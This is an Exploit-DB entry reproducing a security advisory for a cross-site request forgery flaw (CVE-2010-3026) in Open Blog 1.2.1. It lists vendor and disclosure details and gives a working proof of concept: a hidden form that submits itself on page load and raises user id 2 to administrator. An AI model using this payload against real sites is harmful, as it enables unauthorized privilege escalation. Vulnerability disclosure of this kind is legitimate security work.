Open Blog 1.2.1 - CSRF Vulnerability



EDB-ID: 14562 CVE: 2010-3026 OSVDB-ID: 66925
Author: High-Tech Bridge SA Published: 2010-08-05 Verified: Not Verified
Exploit Code:   Download Vulnerable App:    Download

Rating

(0.0)
Prev Home Next
Vulnerability ID: HTB22496
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_open_blog.html
Product: Open Blog
Vendor: Tomaž Muraus ( http://www.open-blog.info/ )
Vulnerable Version: 1.2.1 and Probably Prior Versions
Vendor Notification: 22 July 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/application/modules/admin/controllers/users.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/users/edit" method="post" >
<input type="hidden" name="display_name" value="User" />
<input type="hidden" name="level" value="administrator" />
<input type="hidden" name="email" value="email (at) example (dot) com [email concealed]" />
<input type="hidden" name="website" value="" />
<input type="hidden" name="msn_messenger" value="" />
<input type="hidden" name="jabber" value="" />
<input type="hidden" name="about_me" value="about_me" />
<input type="hidden" name="id" value="2" />
<input type="submit" name="submit" id="sbmtit" value="Edit ››" />

</form>
<script>
document.getElementById('sbmtit').click();
</script>